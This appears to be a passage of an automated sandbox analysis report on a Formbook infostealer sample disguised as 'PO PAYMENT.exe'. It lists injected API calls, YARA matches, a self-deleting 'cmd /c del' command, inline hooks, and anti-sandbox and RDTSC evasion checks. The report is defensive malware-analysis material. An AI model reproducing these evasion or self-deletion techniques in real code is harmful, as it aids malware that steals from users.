Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389670 NtQueryInformationProcess,5_2_05389670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389950 NtQueueApcThread,5_2_05389950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053899D0 NtCreateProcessEx,5_2_053899D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389820 NtEnumerateKey,5_2_05389820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538B040 NtSuspendThread,5_2_0538B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053898A0 NtWriteVirtualMemory,5_2_053898A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053898F0 NtReadVirtualMemory,5_2_053898F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389B00 NtSetValueKey,5_2_05389B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0538A3B0 NtGetContextThread,5_2_0538A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A20 NtResumeThread,5_2_05389A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A10 NtQuerySection,5_2_05389A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A00 NtProtectVirtualMemory,5_2_05389A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05389A80 NtOpenDirectoryObject,5_2_05389A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9D60 NtCreateFile,5_2_00DE9D60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E90 NtClose,5_2_00DE9E90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E10 NtReadFile,5_2_00DE9E10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9F40 NtAllocateVirtualMemory,5_2_00DE9F40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9D5F NtCreateFile,5_2_00DE9D5F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E8A NtClose,5_2_00DE9E8A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9E5A NtClose,5_2_00DE9E5A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DE9F3A NtAllocateVirtualMemory,5_2_00DE9F3A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC41F50_2_04EC41F5
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC17200_2_04EC1720
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC11C00_2_04EC11C0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC11D00_2_04EC11D0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC19720_2_04EC1972
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC19590_2_04EC1959
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 0_2_04EC17140_2_04EC1714
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0040117B1_2_0040117B
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041E1E61_2_0041E1E6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041D2EF1_2_0041D2EF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041D7501_2_0041D750
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041CFA61_2_0041CFA6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0041E7BE1_2_0041E7BE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0154F9001_2_0154F900
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015641201_2_01564120
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015699BF1_2_015699BF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0161E8241_2_0161E824
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016010021_2_01601002
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A8301_2_0156A830
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016128EC1_2_016128EC
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0155B0901_2_0155B090
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016120A81_2_016120A8
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015720A01_2_015720A0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015ECB4F1_2_015ECB4F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156AB401_2_0156AB40
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01612B281_2_01612B28
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156A3091_2_0156A309
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157ABD81_2_0157ABD8
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0160DBD21_2_0160DBD2
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016003DA1_2_016003DA
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015F23E31_2_015F23E3
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156EB9A1_2_0156EB9A
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157138B1_2_0157138B
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0157EBB01_2_0157EBB0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156B2361_2_0156B236
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015FFA2B1_2_015FFA2B
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01604AEF1_2_01604AEF
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016122AE1_2_016122AE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01611D551_2_01611D55
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01612D071_2_01612D07
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01540D201_2_01540D20
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0155D5E01_2_0155D5E0
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016125DD1_2_016125DD
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015725811_2_01572581
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01602D821_2_01602D82
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0160D4661_2_0160D466
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0156B4771_2_0156B477
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0155841F1_2_0155841F
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_016044961_2_01604496
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01611FF11_2_01611FF1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0161DFCE1_2_0161DFCE
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015656001_2_01565600
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01566E301_2_01566E30
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_0160D6161_2_0160D616
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_01612EF71_2_01612EF7
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: 1_2_015F1EB61_2_015F1EB6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05340D205_2_05340D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05411D555_2_05411D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05412D075_2_05412D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054125DD5_2_054125DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053725815_2_05372581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05402D825_2_05402D82
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0535D5E05_2_0535D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0540D4665_2_0540D466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0535841F5_2_0535841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536B4775_2_0536B477
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054044965_2_05404496
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0541DFCE5_2_0541DFCE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05411FF15_2_05411FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05366E305_2_05366E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0540D6165_2_0540D616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05412EF75_2_05412EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053641205_2_05364120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0534F9005_2_0534F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053699BF5_2_053699BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536A8305_2_0536A830
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054010025_2_05401002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0541E8245_2_0541E824
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053720A05_2_053720A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0535B0905_2_0535B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054128EC5_2_054128EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054120A85_2_054120A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536A3095_2_0536A309
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05412B285_2_05412B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053ECB4F5_2_053ECB4F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536AB405_2_0536AB40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0537EBB05_2_0537EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0540DBD25_2_0540DBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054003DA5_2_054003DA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0537138B5_2_0537138B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053F23E35_2_053F23E3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0537ABD85_2_0537ABD8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0536B2365_2_0536B236
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_053FFA2B5_2_053FFA2B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_05404AEF5_2_05404AEF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_054122AE5_2_054122AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DEE1E65_2_00DEE1E6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD2D905_2_00DD2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD9E405_2_00DD9E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD9E3C5_2_00DD9E3C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DEE7BE5_2_00DEE7BE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DD2FB05_2_00DD2FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00DECFA65_2_00DECFA6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0534B150 appears 136 times
          Source: C:\Users\user\Desktop\PO PAYMENT.exeCode function: String function: 0154B150 appears 145 times
          Source: PO PAYMENT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PO PAYMENT.exe, 00000000.00000000.338369096.0000000000B2C000.00000002.00020000.sdmpBinary or memory string: OriginalFilename) vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000000.00000002.348778465.0000000001280000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000000.00000002.352682981.0000000005FE0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000001.00000002.388683659.00000000017CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000001.00000002.387659502.0000000000A4C000.00000002.00020000.sdmpBinary or memory string: OriginalFilename) vs PO PAYMENT.exe
          Source: PO PAYMENT.exe, 00000001.00000002.389679450.000000000337E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs PO PAYMENT.exe
          Source: PO PAYMENT.exeBinary or memory string: OriginalFilename) vs PO PAYMENT.exe
          Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/4
          Source: C:\Users\user\Desktop\PO PAYMENT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO PAYMENT.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: PO PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO PAYMENT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO PAYMENT.exeReversingLabs: Detection: 35%
          Source: unknownProcess created: C:\Users\user\Desktop\PO PAYMENT.exe 'C:\Users\user\Desktop\PO PAYMENT.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\PO PAYMENT.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO PAYMENT.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess created: C:\Users\user\Desktop\PO PAYMENT.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO PAYMENT.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: PO PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO PAYMENT.exeStatic file information: File size 1077760 > 1048576
          Source: PO PAYMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: PO PAYMENT.exe, 00000001.00000002.388889089.0000000003030000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.369335175.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO PAYMENT.exe, 00000001.00000002.388454014.000000000163F000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.607062972.000000000543F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO PAYMENT.exe, explorer.exe
          Source: Binary string: explorer.pdb source: PO PAYMENT.exe, 00000001.00000002.388889089.0000000003030000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.369335175.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: PO PAYMENT.exe, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.PO PAYMENT.exe.a40000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.PO PAYMENT.exe.a40000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.PO PAYMENT.exe.960000.0.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.PO PAYMENT.exe.960000.1.unpack, FormLogin.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 0_2_04EC214A push 7CFFFFFEh; ret 0_2_04EC214F
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_004170B5 push cs; ret 1_2_004170B8
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0040E24A push eax; iretd 1_2_0040E262
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0040E250 push eax; iretd 1_2_0040E262
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0040E28C push 54A1A97Fh; retf 1_2_0040E292
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0040C49D push ss; retf 1_2_0040C49F
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00417D20 push cs; ret 1_2_00417D29
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0159D0D1 push ecx; ret 1_2_0159D0E4
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0539D0D1 push ecx; ret 5_2_0539D0E4
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DED8F2 pushad ; retf 5_2_00DED8F3
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DE70B5 push cs; ret 5_2_00DE70B8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DDE28C push 54A1A97Fh; retf 5_2_00DDE292
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DDE250 push eax; iretd 5_2_00DDE262
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DDE24A push eax; iretd 5_2_00DDE262
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DDC49D push ss; retf 5_2_00DDC49F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DE7D20 push cs; ret 5_2_00DE7D29
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DECEB5 push eax; ret 5_2_00DECF08
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DECF6C push eax; ret 5_2_00DECF72
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DECF0B push eax; ret 5_2_00DECF72
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_00DECF02 push eax; ret 5_2_00DECF08

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE6
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PO PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match | File source: Process Memory Space: PO PAYMENT.exe PID: 4704, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO PAYMENT.exe, 00000000.00000002.349094746.0000000002ED7000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO PAYMENT.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 0000000000DD98E4 second address: 0000000000DD98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 0000000000DD9B5E second address: 0000000000DD9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
